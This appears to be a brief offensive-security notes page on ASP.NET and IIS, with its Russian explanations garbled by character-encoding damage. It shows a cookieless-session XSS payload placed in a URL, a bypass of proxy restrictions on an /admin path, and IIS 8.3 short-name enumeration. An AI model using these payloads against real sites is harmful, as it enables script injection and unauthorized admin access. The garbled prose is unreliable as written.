Security
ASP.NET / IIS Security
Notes
Cookieless session
ΠΡΡΠΎΡΠ½ΠΈΠΊ: https://t.me/webpwn/302
Π ASP.NET Π΅ΡΡΡ ΡΠ΄ΠΎΠ±Π½Π°Ρ ΠΎΠ»Π΄ΡΠΊΡΠ»ΡΠ½Π°Ρ ΡΠΈΡΠ° - cookieless session. ΠΠ½Π° ΠΎΡΡΠ°Π»Π°ΡΡ Π΅ΡΡ Ρ ΡΠ΅Ρ Π²ΡΠ΅ΠΌΡΠ½, ΠΊΠΎΠ³Π΄Π° ΠΊΡΠΊΠΈ ΠΏΠΎΠ΄Π΄Π΅ΡΠΆΠΈΠ²Π°Π»ΠΈΡΡ Π½Π΅ Π²ΡΠ΅ΠΌΠΈ Π±ΡΠ°ΡΠ·Π΅ΡΠ°ΠΌΠΈ ΠΈ ΡΠ΅ΡΡΠΈΡ ΠΏΡΠΈΡ ΠΎΠ΄ΠΈΠ»ΠΎΡΡ ΠΏΠ΅ΡΠ΅Π΄Π°Π²Π°ΡΡ Π²Π½ΡΡΡΠΈ URL.
ΠΠ°ΠΏΡΠΈΠΌΠ΅Ρ:
http://www.example.com/(S(lit3py55t21z5v55vlm25s55))/default.aspx
ΠΡΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠΈ Control.ResolveUrl ΠΌΠ΅ΡΠΎΠ΄Π°, ΡΡΠΎ Π·Π½Π°ΡΠ΅Π½ΠΈΠ΅ ΠΌΠΎΠΆΠ΅Ρ Π²ΡΠ²ΠΎΠ΄ΠΈΡΡΡ Π±Π΅Π· ΠΊΠΎΡΡΠ΅ΠΊΡΠ½ΠΎΠ³ΠΎ ΡΠ½ΠΊΠΎΠ΄ΠΈΠ½Π³Π° ΡΠΈΠΌΠ²ΠΎΠ»ΠΎΠ², ΡΡΠΎ ΠΌΠΎΠΆΠ΅Ρ Π΄Π°Π²Π°ΡΡ Π½Π°ΠΌ XSS-ΠΊΡ:
<script src="<%= ResolveUrl("~/Script.js") %>"></script>
+
http://example.com/(A(%22onerror=%22alert`1`%22))/default.aspx
->
<script src="/(A("onerror="alert`1"))/Script.js"></script>
ΠΠΎΠ»Π΅Π΅ ΠΏΠΎΠ΄ΡΠΎΠ±Π½ΠΎ ΠΎΠ± ΡΡΠΎΠΉ ΠΎΡΠΎΠ±Π΅Π½Π½ΠΎΡΡΠΈ ΠΈ ΡΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΠΈ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΡΠΈΡΠ°ΡΡ Π’Π£Π’
ΠΡΠΎΠΌΠ΅ ΡΠΎΠ³ΠΎ, ΡΡΡ ΡΠΈΡΡ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡ Π΄Π»Ρ ΠΎΠ±Ρ ΠΎΠ΄Π° ΠΎΠ³ΡΠ°Π½ΠΈΡΠ΅Π½ΠΈΠΉ Π½Π° ΡΠ΅Π²Π΅ΡΡ ΠΏΡΠΎΠΊΡΠΈ ΠΊ Π°Π΄ΠΌΠΈΠ½ΠΊΠ΅ ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ Π±ΡΠΊΡΠ½Π΄Π° (Π²ΡΡ ΡΡΠΎ Π½Π°ΡΠΈΠ½Π°Π΅ΡΡΡ Ρ β/adminβ), Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ:
http://victim.com/admin - 403
http://victim.com/(A(ABCD))/admin - 200
Short Names (8.3 convention; Tricks with ~1 in Windows)
ΠΡΠ»ΠΈ Π·Π½Π°Π΅ΠΌ ΠΏΠ΅ΡΠ²ΡΠ΅ 6 ΡΠΈΠΌΠ²ΠΎΠ»ΠΎΠ² Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ ΠΈΠ»ΠΈ ΡΠ°ΠΉΠ»Π°, ΡΠΎ ΠΎΡΡΠ°Π²ΡΡΡΡΡ ΠΌΠΎΠΆΠ΅ΠΌ Π·Π°ΠΌΠ΅Π½ΠΈΡΡ Π½Π° ~1
Π‘ΠΊΠ°Π½Π΅Ρ Π΄Π»Ρ IIS: https://github.com/irsdl/iis-shortname-scanner
Last updated